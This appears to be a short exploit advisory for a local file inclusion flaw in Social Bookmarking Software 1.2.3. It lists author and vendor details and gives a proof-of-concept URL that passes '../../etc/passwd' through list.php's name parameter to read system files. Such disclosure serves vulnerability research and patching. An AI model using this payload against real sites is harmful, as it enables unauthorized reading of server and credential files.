Social Bookmarking Software 1.2.3 Local File Inclusion

Social Bookmarking Software version 1.2.3 suffers from a local file inclusion vulnerability.


MD5 | 72101fb7a6446f6e2f1eb53d5d415aac

# Exploit Title: Social Bookmarking Software - Local File Inclusion
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/social-bookmarking-software/
# Demo: http://fxrekeer.com/demo/social-bookmark/
# Tested on: Kali linux, Windows 8.1


# PoC:

# http://localhost/[PATH]/list.php?name=[LFI]
# http://localhost/[PATH]/list.php?name=../../etc/passwd

Related Posts